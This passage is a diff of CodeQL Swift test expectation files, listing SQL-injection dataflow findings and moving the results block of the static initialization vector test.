| GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:225:37:225:37 | remoteString | GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) | GRDB.swift:225:37:225:37 | remoteString | This query depends on a $@. | GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:229:37:229:37 | remoteString | GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) | GRDB.swift:229:37:229:37 | remoteString | This query depends on a $@. | GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:230:37:230:37 | remoteString | GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) | GRDB.swift:230:37:230:37 | remoteString | This query depends on a $@. | GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:234:36:234:36 | remoteString | GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) | GRDB.swift:234:36:234:36 | remoteString | This query depends on a $@. | GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:235:36:235:36 | remoteString | GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) | GRDB.swift:235:36:235:36 | remoteString | This query depends on a $@. | GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:244:38:244:38 | remoteString | GRDB.swift:242:26:242:80 | call to String.init(contentsOf:) | GRDB.swift:244:38:244:38 | remoteString | This query depends on a $@. | GRDB.swift:242:26:242:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:252:32:252:32 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:252:32:252:32 | remoteString | This query depends on a $@. 
| GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:253:32:253:32 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:253:32:253:32 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:254:32:254:32 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:254:32:254:32 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:255:32:255:32 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:255:32:255:32 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:261:29:261:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:261:29:261:29 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:262:29:262:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:262:29:262:29 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:263:29:263:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:263:29:263:29 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:264:29:264:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:264:29:264:29 | remoteString | This query depends on a $@. 
| GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:270:29:270:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:270:29:270:29 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:271:29:271:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:271:29:271:29 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:272:29:272:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:272:29:272:29 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:273:29:273:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:273:29:273:29 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:279:29:279:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:279:29:279:29 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:280:29:280:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:280:29:280:29 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:281:29:281:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:281:29:281:29 | remoteString | This query depends on a $@. 
| GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:282:29:282:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:282:29:282:29 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:293:53:293:53 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:293:53:293:53 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:294:53:294:53 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:294:53:294:53 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:295:53:295:53 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:295:53:295:53 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:296:53:296:53 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:296:53:296:53 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:302:50:302:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:302:50:302:50 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:303:50:303:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:303:50:303:50 | remoteString | This query depends on a $@. 
| GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:304:50:304:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:304:50:304:50 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:305:50:305:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:305:50:305:50 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:311:50:311:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:311:50:311:50 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:312:50:312:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:312:50:312:50 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:313:50:313:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:313:50:313:50 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:314:50:314:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:314:50:314:50 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:320:50:320:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:320:50:320:50 | remoteString | This query depends on a $@. 
| GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:321:50:321:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:321:50:321:50 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:322:50:322:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:322:50:322:50 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:323:50:323:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:323:50:323:50 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:334:57:334:57 | remoteString | GRDB.swift:332:26:332:80 | call to String.init(contentsOf:) | GRDB.swift:334:57:334:57 | remoteString | This query depends on a $@. | GRDB.swift:332:26:332:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:335:57:335:57 | remoteString | GRDB.swift:332:26:332:80 | call to String.init(contentsOf:) | GRDB.swift:335:57:335:57 | remoteString | This query depends on a $@. | GRDB.swift:332:26:332:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:344:51:344:51 | remoteString | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | GRDB.swift:344:51:344:51 | remoteString | This query depends on a $@. | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:345:51:345:51 | remoteString | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | GRDB.swift:345:51:345:51 | remoteString | This query depends on a $@. 
| GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:346:66:346:66 | remoteString | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | GRDB.swift:346:66:346:66 | remoteString | This query depends on a $@. | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:347:66:347:66 | remoteString | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | GRDB.swift:347:66:347:66 | remoteString | This query depends on a $@. | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:348:69:348:69 | remoteString | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | GRDB.swift:348:69:348:69 | remoteString | This query depends on a $@. | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:349:84:349:84 | remoteString | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | GRDB.swift:349:84:349:84 | remoteString | This query depends on a $@. | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:350:69:350:69 | remoteString | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | GRDB.swift:350:69:350:69 | remoteString | This query depends on a $@. | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:351:84:351:84 | remoteString | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | GRDB.swift:351:84:351:84 | remoteString | This query depends on a $@. | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | user-provided value | +| SQLite.swift:73:17:73:17 | unsafeQuery1 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:73:17:73:17 | unsafeQuery1 | This query depends on a $@. 
| SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | +| SQLite.swift:74:17:74:17 | unsafeQuery2 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:74:17:74:17 | unsafeQuery2 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | +| SQLite.swift:75:17:75:17 | unsafeQuery3 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:75:17:75:17 | unsafeQuery3 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | +| SQLite.swift:83:29:83:29 | unsafeQuery3 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:83:29:83:29 | unsafeQuery3 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | +| SQLite.swift:95:32:95:32 | remoteString | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:95:32:95:32 | remoteString | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | +| SQLite.swift:100:29:100:29 | unsafeQuery1 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:100:29:100:29 | unsafeQuery1 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | +| SQLite.swift:103:29:103:29 | unsafeQuery1 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:103:29:103:29 | unsafeQuery1 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | +| SQLite.swift:106:29:106:29 | unsafeQuery1 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:106:29:106:29 | unsafeQuery1 | This query depends on a $@. 
| SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | +| SQLite.swift:109:13:109:13 | unsafeQuery1 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:109:13:109:13 | unsafeQuery1 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | +| SQLite.swift:111:13:111:13 | unsafeQuery1 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:111:13:111:13 | unsafeQuery1 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | +| SQLite.swift:113:13:113:13 | unsafeQuery1 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:113:13:113:13 | unsafeQuery1 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | +| SQLite.swift:115:16:115:16 | unsafeQuery1 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:115:16:115:16 | unsafeQuery1 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | +| SQLite.swift:117:16:117:16 | unsafeQuery1 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:117:16:117:16 | unsafeQuery1 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | +| SQLite.swift:119:16:119:16 | unsafeQuery1 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:119:16:119:16 | unsafeQuery1 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | +| SQLite.swift:132:20:132:20 | remoteString | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:132:20:132:20 | remoteString | This query depends on a $@. 
| SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | +| other.swift:50:22:50:22 | remoteString | other.swift:46:25:46:79 | call to String.init(contentsOf:) | other.swift:50:22:50:22 | remoteString | This query depends on a $@. | other.swift:46:25:46:79 | call to String.init(contentsOf:) | user-provided value | +| other.swift:52:14:52:14 | remoteString | other.swift:46:25:46:79 | call to String.init(contentsOf:) | other.swift:52:14:52:14 | remoteString | This query depends on a $@. | other.swift:46:25:46:79 | call to String.init(contentsOf:) | user-provided value | +| other.swift:53:14:53:14 | remoteString | other.swift:46:25:46:79 | call to String.init(contentsOf:) | other.swift:53:14:53:14 | remoteString | This query depends on a $@. | other.swift:46:25:46:79 | call to String.init(contentsOf:) | user-provided value | +| other.swift:54:14:54:43 | call to NSString.init(string:) | other.swift:46:25:46:79 | call to String.init(contentsOf:) | other.swift:54:14:54:43 | call to NSString.init(string:) | This query depends on a $@. | other.swift:46:25:46:79 | call to String.init(contentsOf:) | user-provided value | +| other.swift:55:14:55:14 | remoteString | other.swift:46:25:46:79 | call to String.init(contentsOf:) | other.swift:55:14:55:14 | remoteString | This query depends on a $@. | other.swift:46:25:46:79 | call to String.init(contentsOf:) | user-provided value | +| other.swift:57:16:57:16 | remoteString | other.swift:46:25:46:79 | call to String.init(contentsOf:) | other.swift:57:16:57:16 | remoteString | This query depends on a $@. | other.swift:46:25:46:79 | call to String.init(contentsOf:) | user-provided value | +| sqlite3_c_api.swift:133:33:133:33 | unsafeQuery1 | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:133:33:133:33 | unsafeQuery1 | This query depends on a $@. 
| sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | user-provided value | +| sqlite3_c_api.swift:134:33:134:33 | unsafeQuery2 | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:134:33:134:33 | unsafeQuery2 | This query depends on a $@. | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | user-provided value | +| sqlite3_c_api.swift:135:33:135:33 | unsafeQuery3 | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:135:33:135:33 | unsafeQuery3 | This query depends on a $@. | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | user-provided value | +| sqlite3_c_api.swift:145:26:145:26 | unsafeQuery3 | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:145:26:145:26 | unsafeQuery3 | This query depends on a $@. | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | user-provided value | +| sqlite3_c_api.swift:175:29:175:29 | unsafeQuery3 | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:175:29:175:29 | unsafeQuery3 | This query depends on a $@. | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | user-provided value | +| sqlite3_c_api.swift:183:29:183:29 | unsafeQuery3 | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:183:29:183:29 | unsafeQuery3 | This query depends on a $@. | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | user-provided value | +| sqlite3_c_api.swift:194:28:194:28 | buffer | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:194:28:194:28 | buffer | This query depends on a $@. 
| sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | user-provided value | +| sqlite3_c_api.swift:202:31:202:31 | buffer | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:202:31:202:31 | buffer | This query depends on a $@. | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | user-provided value | +| sqlite3_c_api.swift:210:31:210:31 | buffer | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:210:31:210:31 | buffer | This query depends on a $@. | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | user-provided value | diff --git a/swift/ql/test/query-tests/Security/CWE-1204/StaticInitializationVector.expected b/swift/ql/test/query-tests/Security/CWE-1204/StaticInitializationVector.expected index 688f7cb4e987..02fdbe6a6a48 100644 --- a/swift/ql/test/query-tests/Security/CWE-1204/StaticInitializationVector.expected +++ b/swift/ql/test/query-tests/Security/CWE-1204/StaticInitializationVector.expected 
@@ -1,33 +1,3 @@ -#select -| rncryptor.swift:68:104:68:104 | myConstIV1 | rncryptor.swift:60:24:60:24 | 0 | rncryptor.swift:68:104:68:104 | myConstIV1 | The static value '0' is used as an initialization vector for encryption. | -| rncryptor.swift:70:104:70:104 | myConstIV2 | rncryptor.swift:61:24:61:24 | 123 | rncryptor.swift:70:104:70:104 | myConstIV2 | The static value '123' is used as an initialization vector for encryption. | -| rncryptor.swift:72:84:72:84 | myConstIV3 | rncryptor.swift:62:24:62:34 | [...] | rncryptor.swift:72:84:72:84 | myConstIV3 | The static value '[...]' is used as an initialization vector for encryption. | -| rncryptor.swift:74:84:74:84 | myConstIV4 | rncryptor.swift:63:24:63:24 | iv | rncryptor.swift:74:84:74:84 | myConstIV4 | The static value 'iv' is used as an initialization vector for encryption. | -| rncryptor.swift:77:125:77:125 | myConstIV1 | rncryptor.swift:60:24:60:24 | 0 | rncryptor.swift:77:125:77:125 | myConstIV1 | The static value '0' is used as an initialization vector for encryption. | -| rncryptor.swift:79:133:79:133 | myConstIV2 | rncryptor.swift:61:24:61:24 | 123 | rncryptor.swift:79:133:79:133 | myConstIV2 | The static value '123' is used as an initialization vector for encryption. | -| rncryptor.swift:81:105:81:105 | myConstIV3 | rncryptor.swift:62:24:62:34 | [...] | rncryptor.swift:81:105:81:105 | myConstIV3 | The static value '[...]' is used as an initialization vector for encryption. | -| rncryptor.swift:83:113:83:113 | myConstIV4 | rncryptor.swift:63:24:63:24 | iv | rncryptor.swift:83:113:83:113 | myConstIV4 | The static value 'iv' is used as an initialization vector for encryption. | -| test.swift:54:17:54:17 | iv | test.swift:99:25:99:120 | [...] | test.swift:54:17:54:17 | iv | The static value '[...]' is used as an initialization vector for encryption. 
| -| test.swift:112:36:112:36 | ivString | test.swift:85:3:85:3 | this string is constant | test.swift:112:36:112:36 | ivString | The static value 'this string is constant' is used as an initialization vector for encryption. | -| test.swift:113:36:113:36 | ivString | test.swift:85:3:85:3 | this string is constant | test.swift:113:36:113:36 | ivString | The static value 'this string is constant' is used as an initialization vector for encryption. | -| test.swift:118:41:118:41 | ivString | test.swift:85:3:85:3 | this string is constant | test.swift:118:41:118:41 | ivString | The static value 'this string is constant' is used as an initialization vector for encryption. | -| test.swift:122:41:122:41 | ivString | test.swift:85:3:85:3 | this string is constant | test.swift:122:41:122:41 | ivString | The static value 'this string is constant' is used as an initialization vector for encryption. | -| test.swift:123:41:123:41 | ivString | test.swift:85:3:85:3 | this string is constant | test.swift:123:41:123:41 | ivString | The static value 'this string is constant' is used as an initialization vector for encryption. | -| test.swift:128:33:128:33 | iv | test.swift:99:25:99:120 | [...] | test.swift:128:33:128:33 | iv | The static value '[...]' is used as an initialization vector for encryption. | -| test.swift:129:33:129:33 | iv2 | test.swift:85:3:85:3 | this string is constant | test.swift:129:33:129:33 | iv2 | The static value 'this string is constant' is used as an initialization vector for encryption. | -| test.swift:130:39:130:39 | ivString | test.swift:85:3:85:3 | this string is constant | test.swift:130:39:130:39 | ivString | The static value 'this string is constant' is used as an initialization vector for encryption. | -| test.swift:135:22:135:22 | iv | test.swift:99:25:99:120 | [...] | test.swift:135:22:135:22 | iv | The static value '[...]' is used as an initialization vector for encryption. | -| test.swift:139:22:139:22 | iv | test.swift:99:25:99:120 | [...] 
| test.swift:139:22:139:22 | iv | The static value '[...]' is used as an initialization vector for encryption. | -| test.swift:140:22:140:22 | iv | test.swift:99:25:99:120 | [...] | test.swift:140:22:140:22 | iv | The static value '[...]' is used as an initialization vector for encryption. | -| test.swift:145:22:145:22 | iv | test.swift:99:25:99:120 | [...] | test.swift:145:22:145:22 | iv | The static value '[...]' is used as an initialization vector for encryption. | -| test.swift:146:22:146:22 | iv | test.swift:99:25:99:120 | [...] | test.swift:146:22:146:22 | iv | The static value '[...]' is used as an initialization vector for encryption. | -| test.swift:147:22:147:22 | iv | test.swift:99:25:99:120 | [...] | test.swift:147:22:147:22 | iv | The static value '[...]' is used as an initialization vector for encryption. | -| test.swift:153:22:153:22 | iv | test.swift:99:25:99:120 | [...] | test.swift:153:22:153:22 | iv | The static value '[...]' is used as an initialization vector for encryption. | -| test.swift:157:24:157:24 | iv | test.swift:99:25:99:120 | [...] | test.swift:157:24:157:24 | iv | The static value '[...]' is used as an initialization vector for encryption. | -| test.swift:161:22:161:22 | iv | test.swift:99:25:99:120 | [...] | test.swift:161:22:161:22 | iv | The static value '[...]' is used as an initialization vector for encryption. | -| test.swift:162:22:162:22 | iv | test.swift:99:25:99:120 | [...] | test.swift:162:22:162:22 | iv | The static value '[...]' is used as an initialization vector for encryption. | -| test.swift:167:22:167:22 | iv | test.swift:99:25:99:120 | [...] | test.swift:167:22:167:22 | iv | The static value '[...]' is used as an initialization vector for encryption. | -| test.swift:168:22:168:22 | iv | test.swift:99:25:99:120 | [...] | test.swift:168:22:168:22 | iv | The static value '[...]' is used as an initialization vector for encryption. 
| edges | rncryptor.swift:60:19:60:25 | call to Data.init(_:) | rncryptor.swift:68:104:68:104 | myConstIV1 | provenance | | | rncryptor.swift:60:19:60:25 | call to Data.init(_:) | rncryptor.swift:77:125:77:125 | myConstIV1 | provenance | | 
@@ -117,3 +87,33 @@ nodes | test.swift:167:22:167:22 | iv | semmle.label | iv | | test.swift:168:22:168:22 | iv | semmle.label | iv | subpaths +#select +| rncryptor.swift:68:104:68:104 | myConstIV1 | rncryptor.swift:60:24:60:24 | 0 | rncryptor.swift:68:104:68:104 | myConstIV1 | The static value '0' is used as an initialization vector for encryption. | +| rncryptor.swift:70:104:70:104 | myConstIV2 | rncryptor.swift:61:24:61:24 | 123 | rncryptor.swift:70:104:70:104 | myConstIV2 | The static value '123' is used as an initialization vector for encryption. | +| rncryptor.swift:72:84:72:84 | myConstIV3 | rncryptor.swift:62:24:62:34 | [...] | rncryptor.swift:72:84:72:84 | myConstIV3 | The static value '[...]' is used as an initialization vector for encryption. | +| rncryptor.swift:74:84:74:84 | myConstIV4 | rncryptor.swift:63:24:63:24 | iv | rncryptor.swift:74:84:74:84 | myConstIV4 | The static value 'iv' is used as an initialization vector for encryption. | +| rncryptor.swift:77:125:77:125 | myConstIV1 | rncryptor.swift:60:24:60:24 | 0 | rncryptor.swift:77:125:77:125 | myConstIV1 | The static value '0' is used as an initialization vector for encryption. | +| rncryptor.swift:79:133:79:133 | myConstIV2 | rncryptor.swift:61:24:61:24 | 123 | rncryptor.swift:79:133:79:133 | myConstIV2 | The static value '123' is used as an initialization vector for encryption. | +| rncryptor.swift:81:105:81:105 | myConstIV3 | rncryptor.swift:62:24:62:34 | [...] | rncryptor.swift:81:105:81:105 | myConstIV3 | The static value '[...]' is used as an initialization vector for encryption. | +| rncryptor.swift:83:113:83:113 | myConstIV4 | rncryptor.swift:63:24:63:24 | iv | rncryptor.swift:83:113:83:113 | myConstIV4 | The static value 'iv' is used as an initialization vector for encryption. | +| test.swift:54:17:54:17 | iv | test.swift:99:25:99:120 | [...] | test.swift:54:17:54:17 | iv | The static value '[...]' is used as an initialization vector for encryption. 
| +| test.swift:112:36:112:36 | ivString | test.swift:85:3:85:3 | this string is constant | test.swift:112:36:112:36 | ivString | The static value 'this string is constant' is used as an initialization vector for encryption. | +| test.swift:113:36:113:36 | ivString | test.swift:85:3:85:3 | this string is constant | test.swift:113:36:113:36 | ivString | The static value 'this string is constant' is used as an initialization vector for encryption. | +| test.swift:118:41:118:41 | ivString | test.swift:85:3:85:3 | this string is constant | test.swift:118:41:118:41 | ivString | The static value 'this string is constant' is used as an initialization vector for encryption. | +| test.swift:122:41:122:41 | ivString | test.swift:85:3:85:3 | this string is constant | test.swift:122:41:122:41 | ivString | The static value 'this string is constant' is used as an initialization vector for encryption. | +| test.swift:123:41:123:41 | ivString | test.swift:85:3:85:3 | this string is constant | test.swift:123:41:123:41 | ivString | The static value 'this string is constant' is used as an initialization vector for encryption. | +| test.swift:128:33:128:33 | iv | test.swift:99:25:99:120 | [...] | test.swift:128:33:128:33 | iv | The static value '[...]' is used as an initialization vector for encryption. | +| test.swift:129:33:129:33 | iv2 | test.swift:85:3:85:3 | this string is constant | test.swift:129:33:129:33 | iv2 | The static value 'this string is constant' is used as an initialization vector for encryption. | +| test.swift:130:39:130:39 | ivString | test.swift:85:3:85:3 | this string is constant | test.swift:130:39:130:39 | ivString | The static value 'this string is constant' is used as an initialization vector for encryption. | +| test.swift:135:22:135:22 | iv | test.swift:99:25:99:120 | [...] | test.swift:135:22:135:22 | iv | The static value '[...]' is used as an initialization vector for encryption. | +| test.swift:139:22:139:22 | iv | test.swift:99:25:99:120 | [...] 
| test.swift:139:22:139:22 | iv | The static value '[...]' is used as an initialization vector for encryption. | +| test.swift:140:22:140:22 | iv | test.swift:99:25:99:120 | [...] | test.swift:140:22:140:22 | iv | The static value '[...]' is used as an initialization vector for encryption. | +| test.swift:145:22:145:22 | iv | test.swift:99:25:99:120 | [...] | test.swift:145:22:145:22 | iv | The static value '[...]' is used as an initialization vector for encryption. | +| test.swift:146:22:146:22 | iv | test.swift:99:25:99:120 | [...] | test.swift:146:22:146:22 | iv | The static value '[...]' is used as an initialization vector for encryption. | +| test.swift:147:22:147:22 | iv | test.swift:99:25:99:120 | [...] | test.swift:147:22:147:22 | iv | The static value '[...]' is used as an initialization vector for encryption. | +| test.swift:153:22:153:22 | iv | test.swift:99:25:99:120 | [...] | test.swift:153:22:153:22 | iv | The static value '[...]' is used as an initialization vector for encryption. | +| test.swift:157:24:157:24 | iv | 